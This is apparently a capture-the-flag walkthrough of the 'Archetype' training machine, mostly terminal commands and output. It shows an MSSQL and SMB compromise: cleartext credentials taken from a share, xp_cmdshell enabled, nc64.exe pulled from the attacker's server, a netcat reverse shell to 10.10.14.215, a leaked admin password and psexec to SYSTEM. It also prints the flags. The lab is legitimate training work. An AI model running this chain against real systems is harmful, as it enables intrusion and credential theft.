01.ARCHETYPE (PRIVESC & MSSQL SERVER)
Protocols, MSSQL, SMB, Powershell, Reconnaissance, Remote Code Execution, Clear Text Credentials, Information Disclosure, Anonymous/Guest Access
Last updated
Protocols, MSSQL, SMB, Powershell, Reconnaissance, Remote Code Execution, Clear Text Credentials, Information Disclosure, Anonymous/Guest Access
Last updated
root@oco:~$ sudo openvpn ~/Downloads/starting_point.ovpnroot@htb:~$ sudo nmap -sV -T4 {targetIP} -p-
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1433/tcp open ms-sql-s Microsoft SQL Server 2017 14.00.1000
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
* Typically '-sV' is used with Nmap to determine versions, but that's not always enough.
- adding the -sC is another good way to determine service versions
- the -sC option will run safe scripts which are designed to provide useful
information without being too intrusive or causing harm to the target systems.
* use the -Pn option of Nmap when ICMP packets are blocked by the Windows firewall
- the -PN option treats all hosts as online and will skip host discoveryroot@htb:~$ nmap -sV -sC -T4 {targetIP} -p 135,139,445,1433,5985,47001,49664-49669
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows Server 2019 Standard 17763 microsoft-ds
1433/tcp open ms-sql-s Microsoft SQL Server 2017 14.00.1000.00; RTM
| ms-sql-info:
| 10.129.250.20:1433:
| Version:
| name: Microsoft SQL Server 2017 RTM
| number: 14.00.1000.00
| Product: Microsoft SQL Server 2017
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
| ms-sql-ntlm-info:
| 10.129.250.20:1433:
| Target_Name: ARCHETYPE
| NetBIOS_Domain_Name: ARCHETYPE
| NetBIOS_Computer_Name: ARCHETYPE
| DNS_Domain_Name: Archetype
| DNS_Computer_Name: Archetype
|_ Product_Version: 10.0.17763
|_ssl-date: 2025-03-05T03:27:06+00:00; -1s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2025-03-05T03:22:42
|_Not valid after: 2055-03-05T03:22:42
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
| smb-os-discovery:
| OS: Windows Server 2019 Standard 17763 (Windows Server 2019 Standard 6.3)
| Computer name: Archetype
| NetBIOS computer name: ARCHETYPE\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2025-03-04T19:27:01-08:00
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2025-03-05T03:26:58
|_ start_date: N/A
|_clock-skew: mean: 1h35m59s, deviation: 3h34m41s, median: -1s
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
* the -SC runs the default set of Nmap scripts (NSE scripts), which typically include
scripts for service enumeration, version detection, and other basic checks.
root@htb:~$ sudo nmap --script=vuln {targetIP} -p 135,139,445,1433,5985,47001,49664-49669
PORT STATE SERVICE
135/tcp filtered msrpc
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds
1433/tcp filtered ms-sql-s
5985/tcp filtered wsman
47001/tcp filtered winrm
49664/tcp filtered unknown
49665/tcp filtered unknown
49666/tcp filtered unknown
49667/tcp filtered unknown
49668/tcp filtered unknown
49669/tcp filtered unknown
* the --script=vuln will run scripts that focus specifically on detecting known
vulnerabilities in the service running on port 6379
- e.g., weak configurations, or known vulnerabilities in the redis service
- if no results are found then the service may be fully patched!#ENUMERATE SMB SHARES
root@htb:~$ smbclient -N -L \\\\{TARGET_IP}\\
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
backups Disk
C$ Disk Default share
IPC$ IPC Remote IPC
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.129.250.20 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
* the ADMIN$ & C$ cannot be accessed as the Access Denied error states; you can verify with the cmd "smbclient \\\\10.129.250.20\\ADMIN$"
* the -N refers to "no password"
* the -L is used to list available shares on the target
root@htb:~$ smbclient \\\\10.129.250.20\\backups -N
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Mon Jan 20 06:20:57 2020
.. D 0 Mon Jan 20 06:20:57 2020
prod.dtsConfig AR 609 Mon Jan 20 06:23:02 2020
5056511 blocks of size 4096. 2499233 blocks available
smb: \> get prod.dtsConfig
getting file \prod.dtsConfig of size 609 as prod.dtsConfig (14.9 KiloBytes/sec) (average 14.9 KiloBytes/sec)
root@htb:~$ cat prod.dtsConfig
<DTSConfiguration>
<DTSConfigurationHeading>
<DTSConfigurationFileInfo GeneratedBy="..." GeneratedFromPackageName="..." GeneratedFromPackageID="..." GeneratedDate="20.1.2019 10:01:34"/>
</DTSConfigurationHeading>
<Configuration ConfiguredType="Property" Path="\Package.Connections[Destination].Properties[ConnectionString]" ValueType="String">
<ConfiguredValue>Data Source=.;Password=M3g4c0rp123;User ID=ARCHETYPE\sql_svc;Initial Catalog=Catalog;Provider=SQLNCLI10.1;Persist Security Info=True;Auto Translate=False;</ConfiguredValue>
</Configuration>
</DTSConfiguration>
* Password=M3g4c0rp123;User ID=ARCHETYPE\sql_svc
root@oco:~$ cd impacket/examples/
root@oco:~$ python3 mssqlclient.py -h
Impacket v0.13.0.dev0+20250226.212301.ead516a1 - Copyright Fortra, LLC and its affiliated companies
root@oco:~$ python3 mssqlclient.py ARCHETYPE/sql_svc@{TARGET_IP} -windows-auth
Impacket v0.13.0.dev0+20250226.212301.ead516a1 - Copyright Fortra, LLC and its affiliated companies
Password:
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(ARCHETYPE): Line 1: Changed database context to 'master'.
[*] INFO(ARCHETYPE): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (140 3232)
[!] Press help for extra shell commands
* the -windows-auth flag specifies the use of Windows Authentication
SQL (ARCHETYPE\sql_svc dbo@master)> help
lcd {path} - changes the current local directory to {path}
exit - terminates the server process (and this session)
enable_xp_cmdshell - you know what it means
disable_xp_cmdshell - you know what it means
xp_cmdshell {cmd} - executes cmd using xp_cmdshell
sp_start_job {cmd} - executes cmd using the sql server agent (blind)
! {cmd} - executes a local shell cmd#step 1: check role
SQL> SELECT is_srvrolemember('sysadmin');
-
1
* 1 refers to boolean true, 0 refers to false
#step 2: check whether xp_command cmd execution is enabled; if not enable it
SQL> EXEC xp_cmdshell 'net user';
ERROR(ARCHETYPE): Line 1: SQL Server blocked access to procedure 'sys.xp_cmdshell' of component 'xp_cmdshell' because this component is turned off as part of the security configuration for this server. A system administrator can enable the use of 'xp_cmdshell' by using sp_configure. For more information about enabling 'xp_cmdshell', search for 'xp_cmdshell' in SQL Server Books Online.
#step 3: enable xp_command cmd execution; this can be turned on by the adversary as they are currently logged in as sysadmin
SQL> EXEC sp_configure 'show advanced options', 1;
INFO(ARCHETYPE): Line 185: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL> RECONFIGURE;
SQL> sp_configure;
name minimum maximum config_value run_value
--------------------------------- ----------- ---------- ------------ ----------
xp_cmdshell 0 1 0 0
SQL> EXEC sp_configure 'xp_cmdshell', 1;
INFO(ARCHETYPE): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL> RECONFIGURE;
#step 4: proceed w/ enumeration
SQL> xp_cmdshell "whoami"
output
-----------------
archetype\sql_svc
NULL
#step 5: establish stable remote shell
SQL> xp_cmdshell "powershell -c pwd"
output
-------------------
NULL
Path
----
C:\Windows\system32
* determine where to put the reverse shell payload - the destination must be a regular user writable share; system32 is writable only by administrators
- good candidates are:
- c:\users\{userName}\downloads
- C:\Users\{userName}\AppData\Local\Temp
root@oco:~$ BROWSER > https://github.com/int0x33/nc.exe/blob/master/nc64.exe?source=post_page-----a2ddc3557403---------------------- > Download RAW
* place the raw executable in ~/Downloads
root@oco:~$ sudo python3 -m http.server 8080
SQL> xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; Invoke-WebRequest http://10.10.14.215:8080/nc64.exe -outfile nc64.exe"
* The -c flag instructs the powershell to execute the command
* Invoke-WebRequest is aliased as wget
* 10.10.14.215:8080 is the attacker's payload server
SQL> xp_cmdshell "powershell -c ls C:\Users\sql_svc\Downloads"
output
--------------------------------------------------------------------------------
NULL
Directory: C:\Users\sql_svc\Downloads
NULL
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 3/8/2025 6:58 AM 226042 nc64.exe
root@oco:~$ sudo nc -nlvp 443
SQL> xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; .\nc64.exe -e cmd.exe 10.10.14.215 443"
* this cmd binds the cmd.exe (on the target) through the nc (nc64.exe uploaded to the target)to the attacker's listener
* 10.10.14.215 is the attacker's IP where a netcat lister is active on port 443
root@oco:~$ nc....
listening on [any] 443 ...
connect to [10.10.14.215] from (UNKNOWN) [10.129.163.160] 49677
Microsoft Windows [Version 10.0.17763.2061]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Users\sql_svc\Downloads> dir ..\Desktop
dir ..\Desktop
Volume in drive C has no label.
Volume Serial Number is 9565-0B4F
Directory of C:\Users\sql_svc\Desktop
01/20/2020 05:42 AM <DIR> .
01/20/2020 05:42 AM <DIR> ..
02/25/2020 06:37 AM 32 user.txt
1 File(s) 32 bytes
2 Dir(s) 10,720,813,056 bytes free
C:\Users\sql_svc\Downloads>type ..\Desktop\user.txt
type ..\Desktop\user.txt
3e7b102e78218e935bf3f4951fec21a3#enumerate and identify privesc vulnerabilities
root@htb:~$ BROWSER > https://github.com/carlospolop/PEASS-ng/releases/download/refs%2Fpull%2F260%2Fmerge/winPEASx64.exe
* place the raw executable in ~/Downloads
root@htb:~$ sudo python3 -m http.server 8080
C:\target> powershell -c Invoke-WebRequest http://10.10.14.215:8080/winPEASx64.exe -outfile C:\Users\sql_svc\Downloads\winPEASx64.exe
powershell -c Invoke-WebRequest http://10.10.14.215:8080/winPEASx64.exe -outfile C:\Users\sql_svc\Downloads\winPEASx64.exe
C:\Users\sql_svc\Downloads>dir
dir
Volume in drive C has no label.
Volume Serial Number is 9565-0B4F
Directory of C:\Users\sql_svc\Downloads
03/08/2025 08:54 AM <DIR> .
03/08/2025 08:54 AM <DIR> ..
03/08/2025 07:12 AM 45,272 nc64.exe
03/08/2025 08:54 AM 1,930,752 winPEASx64.exe
2 File(s) 1,976,024 bytes
2 Dir(s) 10,714,357,760 bytes free
C:\target> powershell -c C:\Users\sql_svc\Downloads\winPEASx64.exe
���������� Enumerating Security Packages Credentials
Version: NetNTLMv2
Hash: sql_svc::ARCHETYPE:1122334455667788:cc329849205c1f61e52fdc19e00aaccc:01010000000000002b788e114b90db014f2d23496717becc000000000800300030000000000000000000000000300000f11c34cbf3b69a899ead4a6e45502bc55e34a586839efe4a44845307169f1c090a00100000000000000000000000000000000000090000000000000000000000
...
���������� PowerShell Settings
PowerShell v2 Version: 2.0
PowerShell v5 Version: 5.1.17763.1
PowerShell Core Version:
Transcription Settings:
Module Logging Settings:
Scriptblock Logging Settings:
PS history file: C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
PS history size: 79B
...
���������� Current Token privileges
� Check if you can escalate privilege using some enabled token https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#token-manipulation
SeAssignPrimaryTokenPrivilege: DISABLED
SeIncreaseQuotaPrivilege: DISABLED
SeChangeNotifyPrivilege: SE_PRIVILEGE_ENABLED_BY_DEFAULT, SE_PRIVILEGE_ENABLED
SeImpersonatePrivilege: SE_PRIVILEGE_ENABLED_BY_DEFAULT, SE_PRIVILEGE_ENABLED
SeCreateGlobalPrivilege: SE_PRIVILEGE_ENABLED_BY_DEFAULT, SE_PRIVILEGE_ENABLED
SeIncreaseWorkingSetPrivilege: DISABLED
...
���������� Analyzing Windows Files Files (limit 70)
C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
C:\Users\Default\NTUSER.DAT
C:\Users\sql_svc\NTUSER.DAT
...
* can target SeImpersonatePrivilege
C:\target> dir C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\
dir
Volume in drive C has no label.
Volume Serial Number is 9565-0B4F
Directory of C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine
01/20/2020 05:04 AM <DIR> .
01/20/2020 05:04 AM <DIR> ..
03/17/2020 01:36 AM 79 ConsoleHost_history.txt
1 File(s) 79 bytes
2 Dir(s) 10,713,939,968 bytes free
C:\target> type C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
net.exe use T: \\Archetype\backups /user:administrator MEGACORP_4dm1n!!
exit#escalate privileges
root@htb:~$ python3 psexec.py administrator@{TARGET_IP}
Impacket v0.13.0.dev0+20250307.160229.6e0a9691 - Copyright Fortra, LLC and its affiliated companies
Password: MEGACORP_4dm1n!!
[*] Requesting shares on 10.129.241.250.....
[*] Found writable share ADMIN$
[*] Uploading file yQzLFkqG.exe
[*] Opening SVCManager on 10.129.241.250.....
[*] Creating service pQUO on 10.129.241.250.....
[*] Starting service pQUO.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.2061]
(c) 2018 Microsoft Corporation. All rights reserved.
* the password can't be given along with the cmd; it must be supplied afterward
C:\Windows\system32> whoami
nt authority\system
C:\Windows\system32> cd c:\users
C:\Users> dir
Volume in drive C has no label.
Volume Serial Number is 9565-0B4F
Directory of c:\Users
01/19/2020 03:10 PM <DIR> .
01/19/2020 03:10 PM <DIR> ..
01/19/2020 10:39 PM <DIR> Administrator
01/19/2020 10:39 PM <DIR> Public
01/20/2020 05:01 AM <DIR> sql_svc
0 File(s) 0 bytes
5 Dir(s) 10,695,737,344 bytes free
C:\Windows\Users> cd c:\users\Administrator
C:\Users\Administrator> cd Desktop
C:\Users\Administrator\Desktop> dir
Volume in drive C has no label.
Volume Serial Number is 9565-0B4F
Directory of c:\Users\Administrator\Desktop
07/27/2021 01:30 AM <DIR> .
07/27/2021 01:30 AM <DIR> ..
02/25/2020 06:36 AM 32 root.txt
1 File(s) 32 bytes
2 Dir(s) 10,695,774,208 bytes free
C:\Users\Administrator\Desktop> type root.txt
b91ccec3305e98240082d4474b848528 